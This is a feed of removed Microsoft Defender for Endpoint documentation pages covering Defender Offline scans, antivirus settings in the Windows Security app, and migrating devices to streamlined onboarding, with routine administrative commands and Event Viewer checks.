-**[Automated investigation and remediation](automated-investigations.md)**
-
-In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender for Endpoint offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.
-
-<a name="ss"></a>
-
-**[Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md)**
-
-Defender for Endpoint includes Microsoft Secure Score for Devices to help you dynamically assess the security state of your enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of your organization.
-
-<a name="mte"></a>
-
-**[Microsoft Threat Experts](microsoft-threat-experts.md)**
-
-Microsoft Defender for Endpoint's new managed threat hunting service provides proactive hunting, prioritization, and additional context and insights that further empower Security operation centers (SOCs) to identify and respond to threats quickly and accurately.
-
-> [!IMPORTANT]
-> Defender for Endpoint customers need to apply for the Microsoft Threat Experts managed threat hunting service to get proactive Targeted Attack Notifications and to collaborate with experts on demand. Experts on Demand is an add-on service. Targeted Attack Notifications are always included after you have been accepted into Microsoft Threat Experts managed threat hunting service.
->
-> If you are not enrolled yet and would like to experience its benefits, go to **Settings** \> **General** \> **Advanced features** \> **Microsoft Threat Experts** to apply. Once accepted, you will get the benefits of Targeted Attack Notifications, and start a 90-day trial of Experts on Demand. Contact your Microsoft representative to get a full Experts on Demand subscription.
-
-<a name="apis"></a>
-
-**[Centralized configuration and administration, APIs](management-apis.md)**
-
-Integrate Microsoft Defender for Endpoint into your existing workflows.
-
-<a name="mtp"></a>
-
-**[Integration with Microsoft solutions](threat-protection-integration.md)**
-
-Defender for Endpoint directly integrates with various Microsoft solutions, including:
--- Microsoft Defender for Cloud-- Microsoft Sentinel-- Intune-- Microsoft Defender for Cloud Apps-- Microsoft Defender for Identity-- Microsoft Defender for Office-- Skype for Business-
-**[Microsoft Defender XDR](/microsoft-365/security/defender/microsoft-365-defender)**
-
-With Microsoft Defender XDR, Defender for Endpoint, and various Microsoft security solutions, form a unified pre- and post-breach enterprise defense suite that natively integrates across endpoint, identity, email, and applications to detect, prevent, investigate, and automatically respond to sophisticated attacks.
-
security Microsoft Defender Offline https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-offline.md
- Title: Microsoft Defender Offline scan in Windows
-description: You can use Microsoft Defender Offline Scan straight from the Microsoft Defender Antivirus app. You can also manage how it's deployed in your network.
- Previously updated : 04/03/2024---------- m365-security-- tier2-- mde-ngp--
-# Run and review the results of a Microsoft Defender Offline scan
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Antivirus](microsoft-defender-antivirus-windows.md)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-
-| Applies to | Type |
-|||
-|**Platform**| Windows|
-|**Protection type** | Hardware|
-|**Firmware/ Rootkit**| Operating system <br/> Driver <br/> Memory (Heap) <br/> Application <br/> Identity <br/> Cloud|
-
-> [NOTE]
-> The protection for this feature focuses on the Firmware/Rootkit.
-
-Microsoft Defender Offline is an anti-malware scanning tool that lets you boot and run a scan from a trusted environment. The scan runs from outside the normal Windows kernel so it can target malware that attempts to bypass the Windows shell, such as viruses and rootkits that infect or overwrite the master boot record (MBR).
-
-You can use Microsoft Defender Offline Scan if you suspect a malware infection, or you want to confirm a thorough clean of the endpoint after a malware outbreak.
-
-## Prerequisites and requirements
-
-The following are the hardware requirements for Microsoft Defender Offline Scan in Windows:
--- x64 Windows 11 -- x64/x86 Windows 10-- x64/x86 Windows 8.1 -- x64/x86 Windows 7 Service Pack 1-
->[!CAUTION]
-> Microsoft Defender Offline Scan does not apply to:
->
-> - ARM Windows 11
-> - ARM Windows 10
-> - Windows Server Stock Keeping Units (SKU's)
-
-For more information about Windows 10 and Windows 11 requirements, see the following articles:
--- [Minimum hardware requirements](/windows-hardware/design/minimum/minimum-hardware-requirements-overview)-- [Hardware component guidelines](/windows-hardware/design/component-guidelines/components)-
-## Microsoft Defender Offline updates
-
-To receive Microsoft Defender Offline Scan updates:
--- Microsoft Defender Antivirus must be your primary antivirus software (not in passive mode).--- Update Microsoft Defender Antivirus how you normally deploy updates to endpoints. Use a supported version of the: -
- - [Platform Update](https://www.microsoft.com/security/portal/definitions/adl.aspx)
-
- - [Engine Update](microsoft-defender-antivirus-updates.md)
-
- - Security Intelligence Updates
- - You can manually download and install the latest protection updates from the [Microsoft Malware Protection Center](https://www.microsoft.com/security/portal/definitions/adl.aspx)
- - See the [Manage Microsoft Defender Antivirus Security intelligence updates](manage-protection-updates-microsoft-defender-antivirus.md) article for more information.
--- Users must be signed in with local administrator privileges.--- Windows Recovery Environment (WinRE) needs to be enabled. -
-> [!NOTE]
-> If WinRE is disabled, the Windows Defender Offline scan doesn't run and no error messages are displayed. Nothing happens even if the machine is restarted manually. To fix this, you only have to enable WinRE.
->
-> - To check the WinRE status, you can execute this command-line: `reagentc /info`.
-> - If the status is Disabled, you can enable it by executing this command-line: `reagentc /enable`.
-
-## Usage scenarios
-
-The need to run Microsoft Defender Offline Scan:
-
-If Microsoft Defender Antivirus determines that you need to run Microsoft Defender Offline, it prompts the user on the device. The prompt can occur via a notification, similar to the following:
-
- :::image type="content" source="../../media/notification.png" alt-text="Notification to run Microsoft Defender Offline" lightbox="../../media/notification.png":::
-
- The user is also notified within the Microsoft Defender Antivirus client. If you're using Intune to manage devices, you can see the notification in Intune.
--- You can manually force an offline scan that is built-in Windows 10, version 1607 or newer, and Windows 11. Or, you can scan through a bootable media for the older Windows OS'es as described [here](#use-the-windows-defender-security-app-to-run-an-offline-scan).-
-In Configuration Manager, you can identify the status of endpoints by navigating to **Monitoring > Overview > Security > Endpoint Protection Status > System Center Endpoint Protection Status**.
-
-Microsoft Defender Offline scans are indicated under **Malware remediation status** as **Offline scan required**.
--
-## Configure notifications
-
-Microsoft Defender Offline notifications are configured in the same policy setting as other Microsoft Defender Antivirus notifications.
-
-For more information about notifications in Windows Defender, see [Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md).
-
-## Run a scan
-
-> [!IMPORTANT]
-> Before you use Microsoft Defender Offline Scan, **make sure you save any files** and shut down running programs. The Microsoft Defender Offline scan takes about 15 minutes to run. It will restart the endpoint when the scan is complete. The scan is performed outside of the usual Windows operating environment. The user interface will appear different to a normal scan performed by Windows Defender. After the scan is completed, the endpoint will be restarted and Windows will load normally.
-
-You can run a Microsoft Defender Offline scan with the following methods:
--- The Windows Security app-- PowerShell-- Windows Management Instrumentation (WMI)-
-### Use the Windows Defender Security app to run an offline scan
-
-Starting with Windows 10, version 1607 or newer, and Windows 11, Microsoft Defender Offline Scan can be run with one click directly from the [Windows Security app](microsoft-defender-security-center-antivirus.md). In previous versions of Windows, a user had to install Microsoft Defender Offline Scan to bootable media, restart the endpoint, and load the bootable media.
-
-> [!NOTE]
-> In Windows 10, version 1607, the offline scan can be run from **Windows Settings > Update & security > Windows Defender** or from the Windows Defender client.
-
-1. On your Windows device, open the Windows Security app, and then **Scan options**.
-
-2. Select the radio button **Microsoft Defender Offline scan** and select **Scan now**.
-
- The process starts from `C:\ProgramData\Microsoft\Windows Defender\Offline Scanner`.
-
-3. You get a prompt to save your work before continuing, similar to the following image:
-
- :::image type="content" source="../../media/defender-offline-save-work.png" alt-text="Screenshot of screen prompt to save all work before continuing.":::
-
- After you saved your work, select **Scan**.
-
-4. After you select **Scan**, you get another prompt requesting your permission to make changes to your device, similar to the following image:
-
- :::image type="content" source="../../media/defender-offline-apply-change.png" alt-text="Screenshot of a screen prompt requesting permission to apply.":::
-
- Select **Yes**.
-
-5. Another prompt appears and informs you that you'll be signed out and Windows will shut down in less than a minute, similar to the following image:
-
- :::image type="content" source="../../media/defender-offline-sign-out-notification.png" alt-text="Screenshot of a screen prompt informing about the sign out.":::
-
-6. You see that the Microsoft Defender Antivirus scan (offline scan) is in progress.
-
- :::image type="content" source="../../media/defender-offline-antivirus-run.png" alt-text="Screenshot of the Microsoft Defender Antivirus scan.":::
-
- You'll see the following image:
-
- :::image type="content" source="../../media/defender-offline-scan-run-2.png" alt-text="Screenshot of a dialogue when the run is ongoing.":::
-
-### Use PowerShell cmdlets to run an offline scan
-
-Use the following cmdlets:
-
-```PowerShell
-Start-MpWDOScan
-```
-
-See [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-### Use Windows Management Instruction (WMI) to run an offline scan
-
-Use the [**MSFT_MpWDOScan**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class to run an offline scan.
-
-The following WMI script snippet will immediately run a Microsoft Defender Offline scan, which will cause the endpoint to restart, run the offline scan, and then restart and boot into Windows.
-
-```console
-wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call Start
-```
-
-For more information, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-**In Windows 7 Service Pack 1 and Windows 8.1:**
-
-1. Download Windows Defender Offline and install it to a CD, DVD, or USB flash drive using the following links:
- - [Download the 64-bit version (msstool64.exe)](https://go.microsoft.com/fwlink/?LinkID=234124)
- - [Download the 32-bit version (msstool32.exe)](https://go.microsoft.com/fwlink/?LinkID=234123)
-
- If you're not sure which version to download, see [Is my PC running the 32-bit or 64-bit version of Windows?](https://support.microsoft.com/windows/32-bit-and-64-bit-windows-frequently-asked-questions-c6ca9541-8dce-4d48-0415-94a3faa2e13d).
-
-2. To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free space, and then run the tool. You are guided through the steps to create the removable media.
-
- > [!TIP]
- > We recommend you to do the following when downloading Windows Defender Offline:
- > - Download Windows Defender Offline and create the CD, DVD, or USB flash drive on a PC that isn't infected with malware as the malware can interfere with the media creation.
- > - If you use a USB drive, the drive will be reformatted and any data on it will be erased. Ensure to back up any important data from the drive first.
-
- :::image type="content" source="../../media/defender-offline-scan-pc-for-virus.png" alt-text="Screenshot of a dialogue for scan in PC.":::
-
-3. Scan your PC for viruses and other malware.
-
- 1. Once you've created the USB drive, CD, or DVD, remove it from your current computer and take it to the computer you want to scan. Insert the USB drive or disc into the other computer and restart the computer.
-
- 2. Boot from the USB drive, CD, or DVD to run the scan. Depending on the computer's settings, it may automatically boot from the media after you restart it, or you may have to press a key to enter a "boot devices" menu or modify the boot order in the computer's UEFI firmware or BIOS.
-
- 3. After you boot the device, you see a Microsoft Defender tool that will automatically scan your computer and remove malware.
-
- 4. After the scan is complete and you're done with the tool, you can reboot your computer and remove the Microsoft Defender Offline media to boot back into Windows.
-
-4. Remove any malware that's found from your PC.
-
- If you experience a Stop error on a blue screen when you run the offline scan, restart your device and try running a Microsoft Defender Offline scan again. If the blue-screen error happens again, contact [Microsoft Support](https://support.microsoft.com/).
-
-### Where can I find the scan results?
-
-To see the Microsoft Defender Offline scan results in Windows 10 and Windows 11:
-
-1. Select **Start**, and then select **Settings** > **Update & Security** > **Windows Security** > **Virus & threat protection**.
-
-2. On the **Virus & threat protection** screen, under **Current threats**, select **Scan options**, and then select **Protection history**.
-For more information, see [Review threat detection history in the Windows Security app](microsoft-defender-security-center-antivirus.md).
-
-### How can I find out if Microsoft Defender Offline scan was kicked off?
-
-In the **Event Viewer**, go to **Applications and Services Logs > Microsoft > Windows > Windows Defender > Operational**. You'll see:
--- Log Name: Microsoft-Windows-Windows Defender/Operational-- Source: Microsoft-Windows-Windows Defender-- Event ID: 2030-- Level: Information-- Description: Microsoft Defender Antivirus downloaded and configured Microsoft Defender Antivirus (offline scan) to run on the next reboot.-
-On older versions than Windows 10, 2004, you'll see:
-
-Windows Defender Antivirus downloaded and configured Windows Defender Offline to run on the next reboot.
--- Log Name: `Microsoft-Windows-Windows Defender/Operational`-- Source: `Microsoft-Windows-Windows Defender`-- Event ID: `5007`-- Level: `Information`-- Description: `Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event, you should review the settings as this may be the result of malware.`-- Old value: `N/A\Scan\OfflineScanRun =`-- New value: `HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\OfflineScanRun = 0x0`-
-## Related articles
--- [Customize, initiate, and review the results of scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Microsoft Defender Security Center Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-security-center-antivirus.md
- Title: Microsoft Defender Antivirus in the Windows Security app
-description: With Microsoft Defender Antivirus now included in the Windows Security app, you can review, compare, and perform common tasks.
----------- m365-security-- tier2 Previously updated : 08/28/2023--
-# Microsoft Defender Antivirus in the Windows Security app
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Beginning with Windows 10, version 1703 and later, Microsoft Defender Antivirus settings are viewable in the Windows Security app. See [Windows Security](/windows/security/operating-system-security/system-security/windows-defender-security-center/windows-defender-security-center) for more information about security features and settings that are built into Windows.
-
-> [!IMPORTANT]
-> Disabling the Windows Security app does not disable Microsoft Defender Antivirus or [Windows Defender Firewall](/windows/security/threat-protection/windows-firewall/windows-firewall-with-advanced-security). These capabilities are disabled or set to passive mode when non-Microsoft antivirus/antimalware software is installed on the device and kept up to date.
-> If you do disable the Windows Security app, or configure its associated Group Policy settings to prevent it from starting or running, the Windows Security app might display stale or inaccurate information about any antivirus or firewall products that are installed on the device.It might also prevent Microsoft Defender Antivirus from re-enabling when you uninstall any non-Microsoft antivirus/antimalware software.
-> Disabling the Windows Security app can significantly lower the level protection of your device and could lead to malware infection.
-
-## Review virus and threat protection settings in the Windows Security app
-
-1. Open the Windows Security app by searching the start menu for **Windows Security**.
-
-2. Select **Virus & threat protection**.
-
-3. Use one or more of the subsequent sections to perform tasks using the Windows Security app.
-
-> [!NOTE]
-> If these settings are configured and deployed using Group Policy, the settings described in this section will be greyed-out and unavailable for use on individual endpoints. Changes made through a Group Policy Object must first be deployed to individual endpoints before the setting will be updated in Windows Settings. The [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md) topic describes how local policy override settings can be configured.
-
-## Run a scan with the Windows Security app
-
-1. Open the Windows Security app by searching the start menu for **Security**, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Select **Quick scan**. Or, to run a full scan, select **Scan options**, and then select an option, such as **Full scan**.
-
-## Review the security intelligence update version and download the latest updates in the Windows Security app
--
-1. Open the Windows Security app by searching the start menu for *Security*, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Select **Virus & threat protection updates**. The currently installed version is displayed along with some information about when it was downloaded. You can check your current against the latest version available for manual download, or review the change log for that version. See [Security intelligence updates for Microsoft Defender Antivirus and other Microsoft antimalware](/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus).
-
-4. Select **Check for updates** to download new protection updates (if there are any).
-
-## Ensure Microsoft Defender Antivirus is enabled in the Windows Security app
-
-1. Open the Windows Security app by searching the start menu for *Security*, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Select **Virus & threat protection settings**.
-
-4. Toggle the **Real-time protection** switch to **On**.
-
- > [!NOTE]
- > If you switch **Real-time protection** off, it will automatically turn back on after a short delay. This is to ensure you are protected from malware and threats.
- > If you install another antivirus product, Microsoft Defender Antivirus automatically disables itself and is indicated as such in the Windows Security app. A setting will appear that will allow you to enable [limited periodic scanning](limited-periodic-scanning-microsoft-defender-antivirus.md).
-
-## Add exclusions for Microsoft Defender Antivirus in the Windows Security app
-
-1. Open the Windows Security app by searching the start menu for *Security*, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Under **Virus & threat protection settings**, select **Manage settings**.
-
-4. Under **Exclusions**, select **Add or remove exclusions**.
-
-5. Select the plus icon (**+**) to choose the type and set the options for each exclusion.
-
-The following table summarizes exclusion types and what happens:
-
-|Exclusion type|Defined by|What happens|
-||||
-|**File**|Location <br/>Example: `c:\sample\sample.test`|The specific file is skipped by Microsoft Defender Antivirus.|
-|**Folder**|Location <br/>Example: `c:\test\sample`|All items in the specified folder are skipped by Microsoft Defender Antivirus.|
-|**File type**|File extension <br/>Example: `.test`|All files with the `.test` extension anywhere on your device are skipped by Microsoft Defender Antivirus.|
-|**Process**|Executable file path <br>Example: `c:\test\process.exe`|The specific process and any files that are opened by that process are skipped by Microsoft Defender Antivirus.|
-
-To learn more, see the following resources:
--- [Configure and validate exclusions based on file extension and folder location](./configure-extension-file-exclusions-microsoft-defender-antivirus.md)-- [Configure exclusions for files opened by processes](./configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-
-## Review threat detection history in the Windows Defender app
-
-1. Open the Windows Security app by searching the start menu for *Security*, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Select **Protection history**. Any recent items are listed.
-
-## Set ransomware protection and recovery options
-
-1. Open the Windows Security app by searching the start menu for *Security*, and then selecting **Windows Security**.
-
-2. Select the **Virus & threat protection** tile (or the shield icon on the left menu bar).
-
-3. Under **Ransomware protection**, select **Manage ransomware protection**.
-
-4. To change **Controlled folder access** settings, see [Protect important folders with Controlled folder access](/microsoft-365/security/defender-endpoint/controlled-folders).
-
-5. To set up ransomware recovery options, select **Set up** under **Ransomware data recovery** and follow the instructions for linking or setting up your OneDrive account so you can easily recover from a ransomware attack.
-
-## See also
--- [Microsoft Defender Antivirus](microsoft-defender-antivirus-in-windows-10.md)---
security Migrate Devices Streamlined https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/migrate-devices-streamlined.md
- Title: Migrate devices to use the streamlined onboarding method
-description: Learn how to migrate devices to Defender for Endpoint using the streamlined connectivity method.
------- m365-security-- tier1-- Previously updated : 02/01/2024--
-# Migrate devices to use the streamlined connectivity method
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-This article describes how to migrate (reonboard) devices that are currently onboarded to Defender for Endpoint to use the streamlined device connectivity method. For more information on streamlined connectivity, see [Onboarding devices using streamlined connectivity](configure-device-connectivity.md). Devices must meet the prerequisites listed in [Streamlined connectivity](configure-device-connectivity.md#prerequisites).
-
-In most cases, full device offboarding isn't required when reonboarding. You can run the updated onboarding package and reboot your device to switch connectivity over. See below for details on individual operating systems.
-
-> [!IMPORTANT]
-> Preview limitations and known issues:
->
-> - For device migrations (reonboarding): Offboarding is not required to switch over to streamlined connectivity method. Once the updated onboarding package is run, a full device reboot is required for Windows devices and a service restart for macOS and Linux. For more information, see the details included in this article.
-> - Windows 10 versions 1607, 1703, 1709, and 1803 do not support reonboarding. Offboard first and then onboard using the updated package. These versions also require a longer URL list.
-> - Devices running the MMA agent are not supported and must continue using the MMA onboarding method.
-
-## Migrating devices using the streamlined method
-
-### Migration recommendation
--- **Start small**. It's recommended to start with a small set of devices first, apply the onboarding blob using any of the supported deployment tools, then monitor for connectivity. If you are using a new onboarding policy, to prevent conflicts make sure to exclude device from any other existing onboarding policies.--- **Validate and monitor**. After onboarding the small set of devices, validate that devices have successfully onboarded and are communicating with the service.--- **Complete migration**. At this stage, you can gradually roll out the migration to a larger set of devices. To complete the migration, you can replace previous onboarding policies and remove the old URLs from your network device.-
-Validate [device prerequisites](configure-device-connectivity.md#prerequisites) before proceeding with any migrations. This information builds upon the previous article by focusing on migrating existing devices.
-
-To reonboard devices, you will need to use the streamlined onboarding package. For more information on how to access the package, see [Streamlined connectivity](configure-device-connectivity.md).
-
-Depending on the OS, migrations may require a device reboot or service restart once the onboarding package is applied:
--- Windows: reboot the device-- macOS: Reboot the device or restart the Defender for Endpoint service by running:
- 1. `sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist`
- 2. `sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist`
--- Linux: Restart the Defender for Endpoint service by running: `sudo systemctl restart mdatp`-
-The following table lists migration instructions for the available onboarding tools based on the device's operating system.
-
-### [Windows 10 and 11](#tab/windows10and11)
-
-### Windows 10 and 11
-
-> [!IMPORTANT]
-> Windows 10 version 1607, 1703, 1709, and 1803 do not support reonboarding. To migrate existing devices, you will need to fully offboard and onboard using the streamlined onboarding package.
-
-For general information on onboarding Windows client devices, see [Onboarding Windows Client](onboard-windows-client.md).
-
-Confirm prerequisites are met: [Prerequisites for using streamlined method](configure-device-connectivity.md#prerequisites).
-
-### Local script
-
-Follow the guidance in [Local script (up to 10 devices)](configure-endpoints-script.md) using the streamlined onboarding package. After completing the steps, you must restart the device for device connectivity to switch over.
-
-### Group policy
-
-Follow the guidance in [Group policy](configure-endpoints-gp.md) using the streamlined onboarding package. After completing the steps, you must restart the device for device connectivity to switch over.
-
-### Microsoft Intune
-
-Follow the guidance in [Intune](/mem/intune/protect/endpoint-security-edr-policy#updating-the-onboarding-state-for-a-device) using the streamlined onboarding package. After completing the steps, you must restart the device for device connectivity to switch over.
-
-### Microsoft Configuration Manager
-
-Follow the guidance in [Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection#bkmk_updateatp).
-
-### VDI
-
-Use the guidance in [Onboard nonpersistent virtual desktop infrastructure (VDI) devices](/microsoft-365/security/defender-endpoint/configure-endpoints-vdi). After completing the steps, you must restart the device for device connectivity to switch over.
-
-### [**Windows Server**](#tab/Windowsserver)
-
-### Windows Server
-
-For general information on onboarding Windows server devices, see [Onboard Windows servers to the Microsoft Defender for Endpoint service](/microsoft-365/security/defender-endpoint/configure-server-endpoints).
-
-Confirm prerequisites are met: [Prerequisites for streamlined method](configure-device-connectivity.md#prerequisites).
-
-### Microsoft Defender for Cloud
-
-The streamlined connectivity method isn't currently supported through Microsoft Defender for Cloud.
-
-### Microsoft Configuration Manager
-
-Follow the guidance in [Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection#bkmk_updateatp).
-
-### Group policy
-
-Follow the guidance in [Group policy](configure-endpoints-gp.md) using the streamlined onboarding package. After completing the steps, you must restart the device for device connectivity to switch over.
-
-### VDI
-
-Follow the guidance in [Onboard nonpersistent virtual desktop infrastructure (VDI) devices](/microsoft-365/security/defender-endpoint/configure-endpoints-vdi). After completing the steps, you must restart the device for device connectivity to switch over.
-
-### [**macOS**](#tab/macOS)
-
-### macOS
-
-For general information on onboarding macOS devices, see [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md).
-
-Confirm prerequisites are met: [Prerequisites for streamlined method](configure-device-connectivity.md#prerequisites).
-
-### Local script
-
-Follow the guidance in [Manual deployment for Microsoft Defender for Endpoint on macOS](mac-install-manually.md) using the streamlined onboarding package.
-
-After completing the steps, you must either reboot the device or restart the service for connectivity to switch over.
-
-### Microsoft Intune
-
-1. In Microsoft Intune, create a new onboarding policy using Custom Configuration profile. Don't assign it yet. Follow the instructions under [Intune-based deployment for Microsoft Defender for Endpoint on Mac](/microsoft-365/security/defender-endpoint/mac-install-with-intune).
-
-2. Exclude the macOS device you're reonboarding from its existing onboarding policy. To learn more about excluding groups from policy assignments, see [Exclude groups from a policy assignment](/mem/intune/configuration/device-profile-assign#exclude-groups-from-a-policy-assignment).
-
-3. Add the assignment of the policy using streamlined onboarding package.
-
-4. Reboot the device.
-
-### JAMF Pro
-
-1. Exclude device from any existing 'onboarding' policies in JAMF Pro.
-
-2. Create a new onboarding policy for the streamlined connectivity approach.
-
-3. Include device in the new streamlined onboarding policy.
-
-4. Reboot device if previously onboarded to Defender for Endpoint. Alternatively, you can restart the service using the following commands:
-
- 1. `sudo launchctl unload /Library/LaunchDaemons/com.microsoft.fresno.plist`
- 2. `sudo launchctl load /Library/LaunchDaemons/com.microsoft.fresno.plist`
-
-For more JAMF guidelines, see [Deploying Microsoft Defender for Endpoint on macOS with JAMF Pro](mac-install-with-jamf.md).
-
-### [**Linux**](#tab/linux)
-
-### Linux
-
-For general information on onboarding Linux devices, see [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md).
-
-Confirm prerequisites are met: [Prerequisites for streamlined method](configure-device-connectivity.md#prerequisites).
-
-### Local script
-
-Use the guidance in [Deploy Microsoft Defender for Endpoint on Linux manually](linux-install-manually.md) using the streamlined onboarding package.
-
-After completing the steps, you must either reboot the device or restart the service using `sudo systemctl restart mdatp`.
-
-Device connectivity to streamlined approach doesn't start if you don't reboot the device.
-
-### Third-party Linux deployment tools (Puppet, Ansible, Chef)
-
-Replace the onboarding package file in the current deployment method.
---
-## Verifying device connectivity with streamlined method for migrated devices
-
-You can use the following methods to check that you have successfully connected Windows devices:
--- [Client analyzer](#use-defender-for-endpoint-client-analyzer-windows-to-validate-connectivity-after-onboarding-for-migrated-endpoints)-- [Tracking with advanced hunting in Microsoft Defender XDR](#tracking-with-advanced-hunting-in-microsoft-365-defender)-- [Track locally using Event Viewer (for Windows)](#tracking-locally-on-a-device-through-windows-event-viewer)-- [Run tests to confirm connectivity with Defender for Endpoint services](#)-- Checking the registry editor-- [PowerShell detection test](#powershell-detection-test)-
-For macOS and Linux, you can use the following methods:
--- MDATP connectivity tests-- Tracking with advanced hunting in Microsoft Defender XDR-- Run tests to confirm connectivity with Defender for Endpoint services-
-### Use Defender for Endpoint Client Analyzer (Windows) to validate connectivity after onboarding for migrated endpoints
-
-Once onboarded, run the MDE Client Analyzer to confirm your device is connecting to the appropriate updated URLs.
-
-Download the Microsoft Defender for Endpoint Client Analyzer tool where Defender for Endpoint sensor is running.
-
-You can follow the same instructions as in [Verify client connectivity to Microsoft Defender for Endpoint service](verify-connectivity.md). The script automatically uses the onboarding package configured on the device (should be streamlined version) to test connectivity.
-
-Ensure connectivity is established with the appropriate URLs.
-
-<a name='tracking-with-advanced-hunting-in-microsoft-365-defender'></a>
-
-### Tracking with advanced hunting in Microsoft Defender XDR
-
-You can use advanced hunting in Microsoft Defender portal to view the connectivity type status.
-
-This information is found in the DeviceInfo table under the "ConnectivityType" column:
-- Column Name: ConnectivityType-- Possible Values: `<blank>`, Streamlined, Standard-- Data type: String-- Description: Type of connectivity from the device to the cloud-
-Once a device is migrated to use the streamlined method and the device establishes successful communication with the EDR command & control channel, the value will be represented as "Streamlined".
-
-If you move the device back to the regular method, the value will be "standard".
-
-For devices that have not yet attempted reonboard, the value will remain blank.
-
-### Tracking locally on a device through Windows Event Viewer
-
-You can use Windows Event Viewer's SENSE operational log to locally validate connections with the new streamlined approach. SENSE Event ID 4 tracks successful EDR connections.
-
-Open the Defender for Endpoint service event log using the following steps:
-
-1. On the Windows menu, select **Start**, then type **Event Viewer**. Then select **Event Viewer**.
-
-2. In the log list, under **Log Summary**, scroll down until you see **Microsoft-Windows-SENSE/Operational**. Double-click the item to open the log.
-
- :::image type="content" source="media/log-summary-event-viewer.png" alt-text="Screenshot of Event Viewer with log summary section":::
-
- You can also access the log by expanding**Applications and Services Logs>Microsoft>Windows>SENSE** and select **Operational**.
-
-3. Event ID 4 tracks successful connections with Defender for Endpoint Command & Control channel. Verify successful connections with updated URL. For example:
-
- ```
- Contacted server 6 times, all succeeded, URI: <region>.<geo>.endpoint.security.microsoft.com.
- <EventData>
- <Data Name="UInt1">6</Data>
- <Data Name="Message1">https://<region>.<geo>.endpoint.security.microsoft.com>
- </EventData>
- ```
-
-4. Message1 contains the contacted URL. Confirm the event includes the streamlined URL (endpoint.security.microsoft, com).
-
-5. Event ID 5 tracks errors if applicable.
-
-> [!NOTE]
-> SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft Defender for Endpoint. <br>
-> Events recorded by the service will appear in the log. <br>
-> For more information, see [Review events and error using Event Viewer](event-error-codes.md).
-
-### Run tests to confirm connectivity with Defender for Endpoint services
-
-Once the device is onboarded to Defender for Endpoint, validate that it's continuing to appear in Device Inventory. The DeviceID should remain the same.
-
-Check the Device Page Timeline tab to confirm events are flowing from the device.
-
-#### Live Response
-
-Ensure [Live Response](respond-machine-alerts.md#initiate-live-response-session) is working on your test device. Follow instructions in [Investigate entities on devices using live response](live-response.md).
-
-Make sure to run a couple of basic commands post-connection to confirm connectivity (such as cd, jobs, connect).
-
-#### Automated investigation and response
-
-Ensure that Automated investigation and response is working on your test device: [Configure automated investigation and response capabilities](/microsoft-365/security/defender/m365d-configure-auto-investigation-response).
-
